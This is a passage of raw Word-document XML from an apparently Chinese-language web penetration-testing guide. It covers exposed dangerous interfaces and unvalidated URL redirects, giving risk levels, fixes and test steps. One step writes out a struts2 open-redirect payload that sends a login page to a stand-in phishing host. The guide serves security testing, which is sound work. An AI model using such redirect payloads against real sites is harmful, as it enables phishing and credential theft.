          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启了危险接口，如</w:t>
      </w:r>
      <w:r w:rsidR="00813CC0" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>订单信息打印、</w:t>
      </w:r>
      <w:r w:rsidR="00D06C0D" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传、</w:t>
      </w:r>
      <w:r w:rsidR="00813CC0" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00813CC0" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理控制台等，可能被攻击者发现并利用，直接操作应用数据，造成数据泄漏等风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569BEFD9"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D3DE3" w14:textId="46EB6092" w:rsidR="009145B3" w:rsidRPr="00A12C9A" w:rsidRDefault="00DA2B07" w:rsidP="00A12C9A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：正常情况接口是在认证之后被调用，如果可公网直接无认证使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA631DC" w14:textId="30A91DE8" w:rsidR="00DA2B07" w:rsidRPr="00A12C9A" w:rsidRDefault="00DA2B07" w:rsidP="00A12C9A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在特权、非正常用户不可知但可利用接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294BF014"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1583A932" w14:textId="6D7EBACE" w:rsidR="009145B3" w:rsidRPr="00A12C9A" w:rsidRDefault="00F26DF5" w:rsidP="00A12C9A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感接口增加访问控制</w:t>
      </w:r>
      <w:r w:rsidR="00F076F1" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，避免未授权访问</w:t>
      </w:r>
      <w:r w:rsidR="00C63D50" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE72089" w14:textId="31D17217" w:rsidR="00F26DF5" w:rsidRDefault="00F26DF5" w:rsidP="00A12C9A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户访问接口需校验权限</w:t>
      </w:r>
      <w:r w:rsidR="00F076F1" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，避免越权访问</w:t>
      </w:r>
      <w:r w:rsidR="00C63D50" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54713E77" w14:textId="5393F56E" w:rsidR="000C0F87" w:rsidRPr="00A12C9A" w:rsidRDefault="000C0F87" w:rsidP="000C0F87">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7D53013" w14:textId="2C2C4DE1" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="005006B1" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc498434518"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未验证的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="7099F37E" w14:textId="0DD4FE8A"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端未对传入的跳转</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量进行检查和控制，可能导致可恶意构造任意一</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>个恶意地址，诱导用户跳转到恶意网站。由于是从可信的站点跳转出去的，用户会比较信任，所以跳转漏洞一般用于钓鱼攻击，通过转到恶意网站欺骗用户输入用户名和密码盗取用户信息，或欺骗用户进行金钱交易；也可能引发的</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞（主要是跳转常常使用</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>302</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转，即设置</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头，</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Locatioin: url</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含了</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CRLF</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则可能隔断了</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头，使得后面部分落到了</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http body</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从而导致</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞）。另外在</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">struts2 </w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中存在重定向的漏洞，是因为</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于缩写的导航和重定向前缀“</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>action:</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”、</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redirect:</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”、</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redirectAction:</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00242649" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等参数前缀的内容没有被正确过滤导致的开放式重定向漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1F1D83"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1363F15D" w14:textId="2D870653" w:rsidR="0005340C" w:rsidRPr="00A12C9A" w:rsidRDefault="0005340C" w:rsidP="00A12C9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先找到网站相关</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中存在跳转链接的参数（如登陆页面）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2F4A2F" w14:textId="3F84D6F0" w:rsidR="0005340C" w:rsidRPr="00A12C9A" w:rsidRDefault="0005340C" w:rsidP="00A12C9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在检测的同时，可以修改参数中的合法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为非法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后查看是否能正常跳转或者通过抓包工具获取其</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头中</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值是否包含了构造的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBC046F" w14:textId="1D9B1BA5" w:rsidR="009145B3" w:rsidRPr="00A12C9A" w:rsidRDefault="0005340C" w:rsidP="00A12C9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重定向漏洞，则可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描工具扫描发现，或者手工验证，直接在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后添加</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?redirect:+</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定钓鱼链接，例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.1.82.53:9098/admin/login.action?redirect:http://diaoyu.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行验证</w:t>
      </w:r>
      <w:r w:rsidR="00DD389A" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34355C2D" w14:textId="77777777" w:rsidR="00D75844" w:rsidRPr="00A12C9A" w:rsidRDefault="00C24790" w:rsidP="00A12C9A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者利用</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转漏洞来欺骗安全意识低的用户，从而导致“中奖”之类的欺诈事件发生。同时利用</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转，也可以突破常见的基于“白名单方式”的一些安全限制，如传统</w:t>
      </w:r>
      <w:r w:rsidR="00D75844" w:rsidRPr="00A12C9A">
        <w:rPr>
